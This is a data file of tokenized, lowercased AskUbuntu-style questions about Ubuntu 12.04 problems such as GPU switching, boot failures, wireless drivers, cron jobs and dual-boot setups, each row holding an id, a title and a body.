138998	vgaswitcheroo is n't working in ubuntu 12.04	i always used vgaswitcheroo to turn off my discrete graphic , i did a script to turn off in boot , but now , vgaswitcheroo is n't working anymore , i do n't know why ... look forbidden404 @ forbidden404-inspiron-n5110 : ~ $ ls -l /sys/kernel/debug/vgaswitcheroo/switch ls : can not access /sys/kernel/debug/vgaswitcheroo/switch : permission denied forbidden404 @ forbidden404-inspiron-n5110 : ~ $ grep -i switcheroo /boot/config-* /boot/config-3.2.0-20-generic : config_vga_switcheroo=y /boot/config-3.2.0-23-generic : config_vga_switcheroo=y /boot/config-3.2.0-24-generic : config_vga_switcheroo=y forbidden404 @ forbidden404-inspiron-n5110 : ~ $ sudo su [ sudo ] password for forbidden404 : root @ forbidden404-inspiron-n5110 : /home/forbidden404 # echo off > /sys/kernel/debug/vgaswitcheroo/switch bash : /sys/kernel/debug/vgaswitcheroo/switch : no such file or directory root @ forbidden404-inspiron-n5110 : /home/forbidden404 # ls -l /sys/kernel/debug/vgaswitcheroo/switch ls : can not access /sys/kernel/debug/vgaswitcheroo/switch : no such file or directory and i 'm not using any proprietary driver , k ?
139001	tx 1000 nvidia driver problem	hello i installed the new ubuntu the other day and installed all the drivers and then restart the laptop . then i get the login screen with no problem then when i login the black screen in about 10 mins a window popup saying that the application compiz has closed unexpectedly i relaunch the app . and then it happens again . i have uninstalled nvidia driver then restarted and the os works fine.. tryed older driver and still the same problem . anyone out there can help would be great .
139003	how to link with libcurl on pangolin	since pangolin , i ca n't manage to link any program with libcurl , even the example provided with libcurl themselves . i have installed libcurl : sudo apt-get install libcurl4-gnutls-dev then as the readme says in /usr/share/doc/libcurl4-gnutls-dev/examples i tried compiling the simplest program in the examples ( copied it to /tmp before to avoid write access issues ) `curl-config -- cc -- cflags -- libs` -o simple simple.c and then i get : simple.c : ( .text+0x99 ) : undefined reference to `curl_easy_init' simple.c : ( .text+0xc6 ) : undefined reference to `curl_easy_setopt' simple.c : ( .text+0xd2 ) : undefined reference to `curl_easy_perform' simple.c : ( .text+0xe1 ) : undefined reference to `curl_easy_cleanup' collect2 : ld returned 1 exit status it worked like a charm with 10.04 , but now it does not anymore on 12.04 . any idea on how to link sucessfuly with libcurl in 12.04 ? should i report to launchpad , as obviously , there is something broken , either in the libraries installation , or at least in the documentation ? it could be a issue with new multiarch , something i do wrong on the command line related to that new multiarch , or the libs were not installed in the directories expected by multiarch ?
139006	how can i change screen resolution ?	i have a asus eee pc netbook , 1015cx . i have created a bootable usb to try ubuntu and to test how it looks . the main problem is that the screen resolution is locked at 800x600 where as my netbook usually runs at 1024 minimum . how can i change it ? i see no option in the menu .
139008	how to recover broken xubuntu 12.04 ( recovery mode ) no data loss ?	i 've been working on my problem ( s ) since yesterday morning . i had a bad shut down on my system . upon reboot grub seemed fine i was able to mount my encrypted drive , and delivered to lightdm login prompt . after typing my password , screen dropped to verbose for a sec like usual , but instead of taking me to my desktop i was back at my login screen . o.k . i tried various workarounds . first tried ctrl+alt+f1 dropped to console logged in my user , ran startx , output was : xauth : file /root/.xauthority does not exist fatal server error : server is already active for display 0 if this server is no longer running , remove /tmp/.x0-lock and start again . please consult the the x.org foundation support at http : //wiki.x.org for help . ddxsiggiveup : closing log invalid mit-magic-cookie-1 keyinvalid mit-magic-cookie-1 keyxinit : giving up xinit : unable to connect to x server : resource temporarily unavailable xinit : server error next , i ran startx -- :1 . after that screen just went black ... .nothing ! hmmm ... .reboot now ! i repeated above process . this time i logged in through tty console , stopped lightdm , remembering server is already active for display 0 ctrl+alt+f6 confirmed lightdm was stopped . i did delete the specified file at /tmp/.xo-lock . yes at that point i was able to still browse file system and make changes . it 's at this point that i should have started moving files to my external hdd . but i still was not all too worried . still in terminal . i decided to reconfigure x altogether using dpkg . that did n't work . i ran sudo dpkg-reconfigure -a and there were no errors . good . maybe i should have ran update-initramfs and update-grub just to cover my bases but i did not ! reboot now ! grub is still working . i 'm still able to successfully mount encrypted volume sda5_crypt . ( the only light i can still see at the end of this tunnel . ) now after i successfully mount the encrypted drive , i 'm dropped to initramfs prompt . well this might be good , so i type exit and my output looks like : /init : line 352 : ca n't open /root/dev/console : no such file [ 432.790729 ] kernel panic - not syncing : attempted to kill init ! [ 432.790790 ] pid : 1 , comm : init not tainted 3.2.0-24-generic-pae # 37-ubuntu [ 432.790851 ] call trace : [ 432.790884 ] [ < c1592732 > ] ? printk+0xx2d/0x2f [ 432.790926 ] [ < c1592600 > ] panic+0x161 [ 432.790969 ] [ < c105dfe4 > ] forget_original_parent+0x1e4/0x1f0 [ 432.791024 ] [ < c10eab21 > ] ? perf_cgroup_attach_task+0x11/0x20 [ 432.791077 ] [ < c10eab30 > ] ? perf_cgroup_attach_task+0x20/0x20 [ 432.791130 ] [ < c105e004 > ] exit_notify+0x14/0x140 [ 432.791174 ] [ < c105e7dc > ] do_exit+0x1ac/0x390 [ 432.791215 ] [ < c114497d > ] ? vfs_write+0xed/0x160 [ 432.791260 ] [ < c105eb18 > ] do_group_exit+0x38/0xa0 [ 432.791304 ] [ < c105eb98 > ] sys_exit_group+0x18/0x20 [ 432.791350 ] [ < c15af11f > ] sysenter_do_call+0x12/0x28 [ 432.791400 ] panic occured , switching back to text console any help in recovering my broken system would be greatly appreciated .
139014	how to disable lightdm ?	i want to disable lightdm from autostart . currenty , i run service lightdm disable from terminal , then run startx . update-rc.d doesnt help
139015	enable smooth scrolling for mouse wheel	12.04 has smooth scrolling enabled for touchpads with gtk . i was wondering if it could be enabled for mouse wheels too ? if yes , how ? if not , why not ? thanks .
139017	installing ubuntu 12.04 lts using wubi	i 've had ubuntu 11.04 to 11.10 on my pc , and just upgraded to 12.04 lts . i did n't realize that there was capabilities to install it along side with windows . so now i 'm downloading 12.04 with windows installer . should i uninstall the ubuntu version that 's currently partioned ? ( windows installer = wubi )
139032	how to programmatically fetch a list of applications from the software center	im writing a pygi app where i 'd like to show a list of matching applications from the ubuntu software centre in an auto-completion text entry or dropdwon . i have n't yet figured out the best way to present the information , i just want to make it easier for the user to type the name of an application . but before that , i 'd like to figure out how to get the data . is there an api to get a list of all applications from the software centre , or indirectly through the applications dash in unity ?
139033	lubuntu firefox toggle fullscreen - the menu bar will not come back	i 'm using lubuntu with firefox in place of chromium and i experience the following problem : when i press f11 the application goes to fullscreen mode but when i subsequently press f11 the application will only partially exit fullscreen , since the menu bar is totally hidden and the tabs/toolbar appear only when i move the mouse close to the titlebar . other applications fullscreen ( e.g . geany ) do not have this problem , is this a bug ? is there a workaround ?
139036	how do i fix a `` wireless is disabled by hardware switch '' error ?	i just updated to ubuntu 12.04 from 11.10 but soon after updating i was disappointed to see that wireless is disabled by hardware switch . i can not click the button 'enable wireless ' which is greyed out . without wireless my computer is useless as i have to connect by wire which is not practical . i have a acer travelmate 4500
139037	ubuntu one behind proxy	i have just installed ubuntu 12.04 . i am behind a proxy server which requires authentication . while setting up ubuntu one , it is able to sign into my account ( step 2 ) , but when it comes to step 3 ( select sync folders ) , it just keeps on saying gathering information and nothing happens . how to make ubuntu one work in this case ? thanks in advance .
139043	how do i get skydrive working ?	does anyone know how to make skydrive desktop tool work with 12.04 ?
139047	how do i upgrade to nginx 1.2.0 ?	running ubuntu 11.04 with nginx 0.8.4 how do i upgrade to stable ( 1.2.0 ) without screwing my whole setup ( multiple sites + varnish + php-fpm + memcache ) ?
139051	i have this weird issue with my monitor . how can i fix it ?	i have been experiencing a few problem with my monitor hp ts-19sv even with the newly released ubuntu 12.04 ( although , this had happened before on ubuntu 11.10 , 11.04 , 10.10 and 10.04 . basically , from time to time , when i start my computer and got to the ubuntu 's desktop , i see quite a bit of black lines next to my cursor and when i move the cursor up to the limit of the screen , the desktop fills with those weird lines . something similar happens when a move the cursor at the bottom of the screen . obviously , an image will be more helpful than my attempt of description : look at that rectangle next to my cursor : when i reach the bottom of the screen : when i reach the top of the screen : has anyone experienced something similar to this ? . how can i solve it ? . thanks a lot update : after running sudo lshw -c video i get this : *-display unclaimed description : vga compatible controller product : p4m890 [ s3 unichrome pro ] vendor : via technologies , inc. physical id : 0 bus info : pci @ 0000:01:00.0 version : 01 width : 32 bits clock : 66mhz capabilities : pm agp agp-3.0 vga_controller bus_master cap_list configuration : latency=64 mingnt=2 resources : memory : d8000000-dbffffff memory : fd000000-fdffffff memory : fe8f0000-fe8fffff update ii : the answer given by luis alvarado solved this issue . there is still a weird fading effect when i shut down / log out that happens when there is a process waiting to be closed but for the most part , everything is working great .
139053	how to change a libreoffice impress presentation from 4:3 to 16:9 ratio ?	this is possible in microsoft office via file- > page setup , but in impress no such option is available ? . is it possible to at all ? if so how ?
139054	why does my wine application not display in the dash properly ?	here is my .desktop file for civ 4 : [ desktop entry ] name=civilization 4 - beyond the sword # exec=env wineprefix= '' /home/cornwall/.wine '' wine c : \\\\windows\\\\command\\\\start.exe /unix /home/cornwall/.wine/dosdevices/c : /users/public/start\\ menu/programs/firaxis\\ games/sid\\ meier\\'s\\ civilization\\ 4\\ -\\ beyond\\ the\\ sword/sid\\ meier\\'s\\ civilization\\ 4\\ -\\ beyond\\ the\\ sword.lnk exec=env wineprefix= '' /home/cornwall/.wine '' wine c : \\\\windows\\\\command\\\\start.exe /unix `` /home/cornwall/.wine/dosdevices/c : /users/public/start menu/programs/firaxis games/sid meier 's civilization 4 - beyond the sword/sid meier 's civilization 4 - beyond the sword.lnk '' type=application startupnotify=true path=/home/cornwall/.wine/dosdevices/c : /program files/firaxis games/sid meier 's civilization 4/beyond the sword icon=/home/cornwall/.wine/drive_c/program files/firaxis games/sid meier 's civilization 4/beyond the sword/assets/res/civ4bts.ico the commented out line is the original exec line . i ran desktop-file-validator and it notified me of the quotation mark in `` meier 's '' to be false . i fixed that in the line below the commented one . the validator does not output any other errors now . however , all i get is this : i could live without the title showing but unity also wo n't let me pin it to the dash ( while other properly generated wine programs can be ) . what am i doing wrong ?
139057	link new compiled app to old command in terminal ?	i uninstalled the official release of php5 for ubuntu and installed my own from source . everythings great and it 's all installed except even with using the checkinstall command and naming my package `` php '' i can not seem to get ubuntu to register the temrinal php command to my new php install . so i wan na be able to do : php -v and for ubuntu to kow the binary is in say /etc/php5 and it 's installed . how would i go about this ? thanks ,
139058	nautilus does not show the left bar , how do i turn it back on ?	when i open nautilus does not open the left bar where it says computer and down markers such as music , documents , videos , downloads . i reinstalled nautilus from the synaptic package manager but nothing happened . what i can do to make that bar visible again ?
139061	crontab not working	i know that this was asked several times , but i do n't know what to do ... i 've tried all the solutions proposed on askubuntu , but with no results ... so ... i have this shell script in my home /home/napolux : # ! /bin/bash now= $ ( date + '' % y % m % d- % t '' ) cutycapt -- url=http : //example.com -- out=/home/napolux/screens/yc. $ now.png the crontab is this : * * * * * /home/napolux/yc-screens > /dev/null cutycapt is a small command line tool that takes screenshots of webpages . the script ( and the destination folder /home/napolux/script ) as 777 permissions with execution flag . the script is correct : by calling it via shell i can get the screenshot . in /var/log/syslog i see the job running every minute . may 18 20:13:01 ubu cron [ 2649 ] : ( cron ) info ( no mta installed , discarding output ) may 18 20:14:01 ubu cron [ 2657 ] : ( napolux ) cmd ( /home/napolux/yc-screens > /dev/null ) may 18 20:14:01 ubu cron [ 2656 ] : ( cron ) info ( no mta installed , discarding output ) may 18 20:15:01 ubu cron [ 2662 ] : ( napolux ) cmd ( /home/napolux/yc-screens > /dev/null ) may 18 20:15:01 ubu cron [ 2661 ] : ( cron ) info ( no mta installed , discarding output ) so , what can i do ? ? ?
139062	upgrade to 12.04 from natty ?	i 'm trying to upgrade to precise , i 'm on natty now . tried this guide to upgrade , but the update manager only lets me upgrade to 11.10 . tried also to check `` only lts relases '' on the settings . so , how to upgrade directly from natty ? //thegatorade
139069	why does virt-install man page restrict valid mac addresses ?	i 'd like to use virt-install to create a vm with a specific mac address . the virt-install man page has this restriction about specifying a mac address : for xen virtual machines it is required that the first 3 pairs in the mac address be the sequence '00:16:3e ' , while for qemu or kvm virtual machines it must be '52:54:00 ' . what 's the purpose of this restriction ? note that when i create instances with openstack ( which is using kvm via libvirt ) , the instances are assigned mac addresses start with fa:16:3e , and everything seems to work fine .
139070	ca n't set up dual monitors due to `` randr extension is not present '' error	i have my pc dual boot into ubuntu currently , and i am having issues ( i assume because i have 2 monitors ) . i had an older version of ubuntu running fine with two monitors on this same computer , but after the upgrade things got messed up apparently . ( now on 11.10 i believe ) if i reboot into normal mode , i am able to log in , but when i do i just see the wallpaper and nothing else on both monitors . however , i can select to login using the 2d method i think and it seems to load up . i am now looking at two monitors that have the exact same thing on them . when i try to go into display settings i get the following : could not get screen information : randr extension is not present . i did a bit of research around the web and found that this probably had to do with my video card ( nvidia geforce 480 ) and the dual monitor setup . it seems people fix this in varying ways depending on their set-up . usually they have at least some knowledge of the terminal which i do not . could anyone be so kind as to help me out here ? i really appreciate it !
139073	empathy not connecting to openfire	i have openfire installed on a local network and am trying to connect to it with empathy with the username/password created and empathy keeping raising authentication failed error . using pidgin , am able to connect without any trouble . what could be wrong please ?
139075	cyrillic characters show as gibberish in rhythmbox	i have some bulgarian/russian songs which have cyrillic characters in them . nautilus displays them fine , but in rhythmbox all their id3tag info is displayed as gibberish . i have set the system language to russian ( utf-8 ) . downloaded some program named mp3diags with which i tried to convert id3 tags to utf-8 but instead of gibberish the song was displayed with chinese letters . i tried to use easytag , but could not find out how to mass rename song titles or to convert them to utf-8 . p.s there are some songs which are displayed right in rhythmbox ( i.e i can see the artist name , album , song title just fine - all written in cyrillic ) , does that mean that the problem is in my songs ? if someone has faced similar problem i would be most grateful for some info on solving it .
139077	file sync error . ( local and server roots are different ( root mismatch ) ) in windows seven	i have a pc with a dual-boot os , one with ubuntu , and one with windows seven . i installed ubuntuone on both , and it works fine on ubuntu , but in windows i have this message : '' file sync error . ( local and server roots are different ( root mismatch ) ) windows '' i have read many post on this problem , but none have solved my problem . please , can you help me ?
139085	skype and mathematica cause lots of trouble after upgrade to 12.04	after upgrading to 12.04 , skype and mathematica randomly disappear from the unity launcher so that they are unusable anymore . calling them again from the dashboard does not bring it back , since this just launches other instances of the programs . the only thing i can do is reboot . even restarting the gui or login-logout does not solve it . only reboot will do . i assume it is related to their qt framework and i am in serious need of a fix . question that might be related qt apps problems in ubuntu 12.04
139088	alt-tab freezes windows and many programs	per this thread and its solution , i 'm using compiz for enabling alt-tab window switch . it had been working as expected for a few days , but today suddenly it started to freeze the entire display . since it stops responding with its keyboard & mouse , i have to login via ssh and reboot ( i just wanted to be as nice as possible to the system ) . any idea is appreciated . just describing my environment more precisely , i use this problematic ubuntu ( 12.04 , gnome classic ) machine from mac via synergy 1.3.6 . and i particularly see this issue happen when i switch to filezilla ( ftp client ) . with gnome classic ( no effect ) i 've not seen this .
139089	what does indicator-application-service do ?	my attention was brought to a process named indicator-application-service because it was idling at 28 % cpu usage . what does this program do ?
139090	show all lines of a ( log ) file in terminal	with wich command can i get all the lines of a file in my terminal ? tail and cat shows me only the last part of the file
139093	wine does n't load steam ingame overlay in any game	when i execute wine in steam , everything goes alright , except steam game overlay i have check if it is activated in steam , if my hot key combination is alright and everything , but i still do n't get in-game community to work . any help is appreciated .
139098	how do i install the scopes of graphic design lens in 12.04 ?	in ubuntu 11.10 , i used a unity-lens called graphicdesign from ppa : scopes-packagers/ppa . i installed it on both 11.10 and 12.04 with : sudo apt-get install unity-lens-graphicdesign unity-scope-colourlovers unity-scope-deviantart unity-scope-dribbble unity-scope-iconfinder but in 12.04 , trying to install it like i did , i find the following packages that were included are missing - no installation candidate found : unity-scope-colourlovers unity-scope-dribbble unity-scope-iconfinder the unity-scope-deviantart scope installs just fine , but these other three scopes are crucial for the graphicdesign lense to be useful ! has anybody had any luck finding updates for these three packages ? edit : i understand that there are no precise packages in the mentioned ppa ; does anyone know where to get updates for the 3 missing packages ?
139103	macbook air 4,2 : `` boot error '' with 12.04 live usb	i have been using ubuntu 11.10 on my macbook air 4,2 for a time now and wanted to upgrade to 12.04 . the upgrade process worked flawlessly until the reboot . after rebooting , my boot partition did n't work anymore and now i have to fix that by booting into a live usb stick . the problem is : no matter what i do , i always end up with a black screen showing boot error and a blinking cursor beneath . this screen appears after i select the live usb in refit and press return ( or the ubuntu boot partition , or the live usb-copied-to-harddisk-partition ) . i also get this black boot error screen when i do n't use refit but the normal osx boot manager ( by keeping alt pressed during boot ) . note that i do not get to see any other output ; not grub , not the linux loader , not the ubuntu splash screen - nothing except this message . i tried unetbootin with the normal desktop amd64 iso and the desktop+mac iso , also tried both converted to .dmg with hdiutil , and both with the script that the ubuntu installation instructions suggest . all of them give me the black boot error screen . what can i do to get past this error ? what could be the reason for this error ?
139110	new video card breaks grub auto boot to gui	i recently swapped out an old ati video card for a newer nvidia card . the card seems to be working just fine and i can get a gui with some effort . however , the new video card seems to have broke grub . when i boot up , the gui is no longer automatically selected . instead , all i get is a flashing cursor . i tried switching to one of the other terminals ( ctrl+alt+f1 ) but there is still a flashing cursor . although i can successfully switch to the gui via ctrl+alt+f7 and log in . how can i fix grub and boot up to the gui directly again ? thanks
139111	keep external monitor on when laptop is closed	i am running ubuntu 12 on a 5 year old sony vaio laptop . the battery is totally shot and does not even register anymore , so i am using it as a desktop instead , with an external monitor . unfortunately , i have to keep the laptop lid open . i tried changing the power setting to do nothing when the lid is closed , but the system does not respect that setting . i am wondering if this is related to my dysfunctional battery . if anyone knows how i can overcome this problem ?
139116	how can i make inkscape run fast , without using these tricks ?	inkscape was very slow on my pc , but fortunately , i found a solution . removing liboverlay* packages and overlay-scrollbar helps . but i do n't want to use this tricks to speedup inkscape . so , my question is : how can i make inkscape faster without removing these components ?
139121	grub rescue prompt after install installing ubuntu in a dual boot	i have dual boot with windows 7 and ubuntu 11.10 . yesterday i tried installing ubuntu 12.04 lts from a cd . but now , when restarting my pc i get this error : error : no such device : 4cfe3cc0-370e-48ed-82cd-7cd2ca7a0414 . grub rescue > i am not an experienced ubuntu user and would appreciate any help since i can now no longer use my pc at all .
139123	what purchasable wireless cards support master-mode/hostapd ?	what i am looking for : links to specific purchasable cards ( amazon , google shopping results , anything that will last ) there is a preference for n support what i 'm not looking for : your personal ebay link chipsets as revealed by linux-wireless '' this one does n't work '' usb , pcmcia , expresscard , pci , pcie are all acceptable . i just think there should be a `` this specific card someone can buy worked for me '' type of place to find this information . to be clear , each individual answer does n't need to be a list . if every individual that has hostapd working on some card contributes a post here , then we can develop a confirmed and recent list .
139138	backlight on a dell m1330	on my dell m1330 , there 's 7 or 8 levels of backlight , but hitting [ fn ] + [ up ] and [ fn ] + [ down ] changes brightness level about 3 notches . any suggestions to make it change it only 1 ?
139139	how do you background a ssh process ?	i know you can suspend a ssh session with ~^z , but is there also a way to background it so that it continues working while you do something else in the local shell ?
139144	is there any way to put ubuntu on a hp touchpad ?	is there any talk on getting on the touchpad ? is it even possible ?
139147	how do i remove windows snap in gnome fallback session ?	application windows randomly snap either to the top or bottom of the screen , and wo n't be budged i can move them from side to side but they 're locked either at the top or the bottom and on some occasions side to side . it 's never the same window two sessions in a row , but it is extremely annoying . it happens randomly and will continue to do it for that particular application window for the entire session if i log out and log back in it will be a different application window . it 's the only machine that does it , we have two machines running 12.04 , and it 's also the only machine running the gnome fallback sessions . other than just do n't use gnome i need some kind of answer , the eu wo n't consider using any other desktop environment except the gnome fallback .
139148	ubuntu 12.04 freezes after login	i installed ubuntu 12.04 to dual boot with windows 7 on an acer netbook . the netbook boots to ubuntu without a problem but freezes at login or right after . nothing moves and nothing responds . i have to shut down the computer to restart it . any suggests as to how to correct the problem ?
139150	enable wifi firmware on ubuntu 12.04	i 'm using ubuntu 12.04 on a macbook pro 8,1 , but my wireless driver says that the firmware is missing , i 've tried with many methods on the internet but i have n't found anything , so , what do i have to do ? i 'm such a noob so i 'd like a semi-detailed tutorial so i can understand what to do , thank you
139157	booting ubuntu 12.04 with `` acpi=off '' grub parameter	in order for me to boot into 12.04 , i have to add the parameter acpi=off in grub . any other options as specified here do not allow me to boot into ubuntu . my question is simple , what does setting the parameter acpi=off actually do ? and more importantly does repeatedly booting with acpi=off damage or harm the computer in anyway ?
139159	ubuntu package for alloy analyzer ?	so i 'm experimenting with ubuntu 12.04 after using archlinux for the last 2 years or so . i 'm looking for an ubuntu package for alloy analyzer and ca n't seem to find one . i 've a hard time believing that the arch package repositories are more complete than the ubuntu repositories are so i assume i 'm just being a dummy . i ca n't find it through the software center or apt-cache search though . any suggestions ? i believe the arch package may be in the aur , does ubuntu have an equivalent ? thanks
139160	how can i search the internet via unity dash ?	i would like the option to be able to search the internet in directly in unity . much like the calculator package works , just adding numbers in and having it compute , i would like to be able to type in a word or phrase , and have an option to search google for it . sorry if this has already been asked , but i can find nothing other than `` web sources '' but it really is not what i am looking for . is this already an idea for a lens ?
139165	what is the difference between skype static and dynamic ?	what is difference between skype static and dynamic ? which package is the best for ubuntu 12.04 on aspire one ( d255e-mic issues ) . static newest version - 2.2.0.99 dynamic and .deb - -2.2.0.35 cheers
139166	games and rendered surfaces get slow after having computer on for some time	i have an i5 2500k and nvidia 9600 gt with proprietary driver . for some reason , this set up on 12.04 ( and was same on 11.10 ) seems to work fine on boot up , but after about 30 mins of use , games and other accelerated surfaces start running at about 5fps . this is fixed by a reboot to start it all over again . is there some way i can get rid of this , as i do n't have this problem with other systems with ubuntu ?
139167	is is possible to render only compiz with unity3d using llvmpipe ?	basically , i have very poor 3d performance on everything opengl when using unity3d . glxgears gives me an average fps of 33fps on unity3d , while using unity2d gives me an average of 58fps . so , i was wondering if it 's possible to load just compiz and unity3d using the llvmpipe software renderer , while still being able to have hardware accelerated opengl for everything else , to keep my fps up , so i can play my games . my graphics hardware is an ati rs480 . i 'm using the stock ubuntu drivers with the extra dri package installed , as i 've found out that using oibaf 's graphics ppa screws everything opengl up for and makes all of the games i play ( urban terror , wine games , openarena ) not render correctly . in the case of wine applications , they all crash .
139168	dell 1390 wireless ( bcm4311 ) ubuntu 12.04 no wireless icon in unity	i have a dell inspiron 1520 , which has the dell wireless 1390 card ( based on the bcm4311 chipset ) . during installation , ubuntu 12.04 detected the device and installed the broadcom sta driver . however , unity is not showing an icon for the wireless device , so i am unable to connect to any networks . any ideas what i need to do to get this working ? edit : lspci -v gives the following info 0c:00.0 network controller : broadcom corporation bcm4311 802.11b/g wlan ( rev 01 ) subsystem : dell wireless 1390 wlan mini-card flags : bus master , fast devsel , latency 0 , irq 17 memory at fe8fc000 ( 32-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : b43-pci-bridge kernel modules : wl , ssb /proc/net/dev does not contain any entries for the device , however ( it just has lo and eth0 listed ) .
139169	'device not ready ' to d-link dfe-580tx wired network adapters	my 3 quad port network adapters can be recognised when i write the 'ifconfig ' command , but they all seem to be in 'device not ready ' state when i click on the networking tab at the toolbar ( please see pictures below ) . at the 'system setting ' they all seem to be recognised but again , their state does n't change when i plug a network cable into them . could anybody advise if there is a solution to this problem ? i 'm a new linux user ( have been using it for the past month ) . the network adapters i have are the d-link dfe-580tx . the adapters used to work excellent with 11.10 , but since i switched to 12.04 ( 32bit or 64bit ) they stopped working . from the toolbar menu , it says that it 's a 'wired network ( d-link dl 10050 sundance ethernet ) . thank you all . user @ phoenix : ~ $ ifconfig eth0 link encap : ethernet hwaddr bc:5f : f4:2b : f9 : bb up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:45 base address:0xa000 eth1 link encap : ethernet hwaddr 00:0d:88:70 : da:38 inet6 addr : fe80 : :20d:88ff : fe70 : da38/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:32 errors:0 dropped:0 overruns:0 carrier:32 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:8666 ( 8.6 kb ) interrupt:16 base address:0xc180 eth2 link encap : ethernet hwaddr 00:0d:88:70 : da:39 inet6 addr : fe80 : :20d:88ff : fe70 : da39/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:27 errors:0 dropped:0 overruns:0 carrier:27 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:7650 ( 7.6 kb ) interrupt:17 base address:0xc100 eth3 link encap : ethernet hwaddr 00:0d:88:70 : da:3a inet6 addr : fe80 : :20d:88ff : fe70 : da3a/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:34 errors:0 dropped:0 overruns:0 carrier:34 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:9078 ( 9.0 kb ) interrupt:18 base address:0xc080 eth4 link encap : ethernet hwaddr 00:0d:88:70 : da:3b inet6 addr : fe80 : :20d:88ff : fe70 : da3b/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:36 errors:0 dropped:0 overruns:0 carrier:36 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:10074 ( 10.0 kb ) interrupt:19 base address:0xc000 and here is the 'lspci | grep ethernet ' output : user @ phoenix : ~ $ user @ phoenix : ~ $ lspci | grep ethernet 04:04.0 ethernet controller : d-link system inc dl10050 sundance ethernet ( rev 14 ) 04:05.0 ethernet controller : d-link system inc dl10050 sundance ethernet ( rev 14 ) 04:06.0 ethernet controller : d-link system inc dl10050 sundance ethernet ( rev 14 ) 04:07.0 ethernet controller : d-link system inc dl10050 sundance ethernet ( rev 14 ) 07:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 06 )
139176	stop ubuntu from booting at start ?	i have a dual-boot hp laptop , with windows 7 home premium and ubuntu 12.04 installed . i messed up a little with windows and i had to restore my system to factory configurations by using a backup disc i created using the manager . but when the recovery manager finishes copying all the files to the hd , it tells me that it has to reboot the machine several times in order to get the default os and drivers installed . but when it first reboots , it automatically boots into the grub manager and tells me to select an os to boot from , and windows does n't appear . so , my question is : is there any way to disable ubuntu from booting first so that it lets the recovery manager to reinstall the files ? or do i have to uninstall ubuntu completely ? if it is the last option , will i still be able to start the recovery manager without any os ? or is my machine perpetually doomed ? any explanation or links to tutorials will be really appreciated . btw , ubuntu starts without any problem , it seems that re-formatting the hard drive does n't affect it -.-
139177	why does `` ping '' work , but `` ping -r '' fails ?	ping www.google.com works , but ping -r www.google.com fails . why ?
139179	ctrl-z equivalent for gui programs ?	i often have to run the update manager on a slow connection , and while reading my emails , i meanwhile would like to surf for 2 minutes in the web , then have the full bandwidth again for the update manager . from the command line , i can suspend a running process with ctrl+z , aka suspend . but if i did n't start the program from the shell - can i do it with some signal and the kill command ? i read the man page for signal ( man -a signal ) , but there i did n't find a sigsuspend , only sigstop , sigterm , sigint and such - which is appropriate , or is there none ?
139183	keeping installed programs when installing new os	i currently have a separate partition for / and /home . however , in the past i 've had a separate /usr for all my installed programs . whenever i change between similar oss ( eg mint and ubuntu ) i simply reinstall and format my / only , keeping files and programs . i am looking for a way to migrate all my programs to /usr without having to redownload packages .
139184	updating ubuntu !	i did n't receive the upgrade notification on the upgrade manager , so i clicked `` search for upgrades '' but the new 12.04 did n't appear . can anyone tell me how to manually upgrade to 12.04 from 11.10 ? thank you very much
139185	can i configure a keyboard shortcut to switch the content when using dual monitors ?	i 'm using ubuntu with two monitors , is there any way to set up a keyboard shortcut that would switch the contents of both monitors ? ( i.e . move every window from the first monitor to the second and every window from the second to the first ) .
139187	wi-fi internet speed for terminal is slow , internet speed on web browser is fast	i just installed a fresh install of 32-bit 12.04 lts pangolin today . when i tried to install a few applications , it was really slow . but when i download a .deb or .tar.gz file from on my web browser , it is a lot faster . computer specs : hp pavilion slimline s7700n pc [ memory ] 873.7 mib [ processor ] amd athlon ( tm ) 64 x2 dual core provessor 3800+ x 2 [ graphics ] geforce 6105 le/integrated/sse2/3dnow ! [ disk size ] 638.5 gb i normally get 200-400 kbps . this is the comparison . http : //i.imgur.com/arjes.png
139193	why ca n't i poweroff my computer if it is n't connected to a power supply ?	when my computer is not plugged in the poweroff function does n't work . it just boots up after poweroff . whenever i poweroff by the way of gui clicking or typing command poweroff or halt , my computer just reboots . but if plugged in , my notebook works without any problem . can any help me ?
139195	how to include an environment variable in the launcher ?	i was trying to make some scripts dynamic by including the environment variable $ logname and even $ home . but it do n't seem to work when placed in a launcher . i am trying to make code a bit more dynamic /home/simon/desktop/firefox_test.bash i tried $ home/desktop/firefox_test.bash and /home/ $ logname/desktop/firefox_test.html but it do n't seem to read the environment variables .
139202	how can i reset the battery statistics for the powermanager ?	i changed my batteries and the battery statistics of the gnome manager got skewed . where would the files having the battery statistics be ?
139203	dual booting windows and ubuntu . windows 7 wont load !	i decided to dual boot ubuntu 11.10 and windows 7 , after i restarted it i did not get the choice between windows and ubuntu . so i downloaded startup manager and realized that windows was not on it . so i check fdisk -l and got this device boot start end blocks id system /dev/sda1 * 2046 42000383 20999169 5 extended partition 1 does not start on physical sector boundary . /dev/sda5 2048 42000383 20999168 83 linux i am not sure what i am supposed to do to get windows started .
